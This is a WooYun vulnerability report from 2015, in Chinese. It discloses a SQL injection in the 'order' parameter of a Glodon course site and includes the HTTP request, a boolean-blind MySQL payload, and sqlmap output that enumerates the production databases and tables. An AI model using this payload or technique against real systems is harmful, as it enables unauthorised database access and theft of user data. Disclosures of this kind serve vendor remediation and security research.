当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163145

漏洞标题:广联达某处SQL注入(2库)

相关厂商:广联达软件股份有限公司

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-12-22 12:46

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-22: 厂商已经确认,细节仅向厂商公开
2016-01-01: 细节向核心白帽子及相关领域专家公开
2016-01-11: 细节向普通白帽子公开
2016-01-21: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

看见厂商说送礼物 瞬间有了动力

详细说明:

00.png


虽然活动结束了 但是 用户信息却留下了····

GET /courses?order=*&page=3 HTTP/1.1
X-Forwarded-For: 8.8.8.8'
X-Requested-With: XMLHttpRequest
Referer: http://haosy.glodon.com:80/
Cookie: _rails_ds2015_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTA4MWNkYzQzYzllNDRjNzVjMGI0Y2M4ZjgwYTFiYjdmBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMU9sUkNFVGZ0NXpWUkR4dWtETkIxSlZTVDQyUGhENHRaMTZodGRETjJSQXM9BjsARkkiE3VzZXJfcmV0dXJuX3RvBjsARiIRL2NvdXJzZXMvMjU0--c096628d995d45729926319bff7b8cc0a3068a4e
Host: haosy.glodon.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


参数 order 可注入

0.png


1.png


Database: ds2015_production
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| score_logs | 2046715 |
| vote_logs | 1421749 |
| fight_papers | 417146 |
| papers | 194765 |
| course_logs | 53751 |
| exam_specialty_statistics | 39498 |
| users | 36065 |
| fight_exams | 33924 |
| sign_ins | 24789 |
| download_logs | 23317 |
| scores | 13116 |
| yyc_statistics | 12528 |
| game_chances | 11859 |
| exams | 7793 |
| notices | 4377 |
| zones | 3218 |
| yysz_statistic_details | 2941 |
| questions | 2496 |
| comments | 1544 |
| assets | 1335 |
| projects | 1205 |
| articles | 1055 |
| videos | 679 |
| administrator_affiliates | 553 |
| courses | 306 |
| permission_events | 88 |
| events | 83 |
| administrators | 73 |
| administrator_permissions | 64 |
| award_records | 63 |
| sessions | 41 |
| affiliates | 40 |
| awards | 39 |
| question_files | 26 |
| chapters | 11 |
| official_materials | 10 |
| areas | 7 |
| games | 4 |
| permissions | 3 |
| announcements | 2 |
| youku_tokens | 1 |
+---------------------------+---------+
[13:52:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2366 times, 502 (Bad Gateway) - 31 times
[13:52:28] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\haosy.glodon.com'
[*] shutting down at 13:52:28

漏洞证明:

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection point(s) with a total of 41 HTTP(s) re
quests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: http://haosy.glodon.com:80/courses?order=(SELECT (CASE WHEN (4871=4
871) THEN 4871 ELSE 4871*(SELECT 4871 FROM INFORMATION_SCHEMA.CHARACTER_SETS) EN
D))&page=3
---
[13:16:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:16:22] [INFO] fetching database names
[13:16:22] [INFO] fetching number of databases
[13:16:22] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[13:16:22] [INFO] retrieved: 2
[13:16:26] [INFO] retrieved:
[13:16:30] [INFO] heuristics detected web page charset 'ascii'
information_schema
[13:17:50] [INFO] retrieved: ds2015_production
available databases [2]:
[*] ds2015_production
[*] information_schema
[13:19:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 162 times, 502 (Bad Gateway) - 1 times
[13:19:25] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\haosy.glodon.com'
[*] shutting down at 13:19:25

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-22 14:31

厂商回复:

我们正在处理中,感谢提交的漏洞。

最新状态:

暂无


漏洞评价:

评价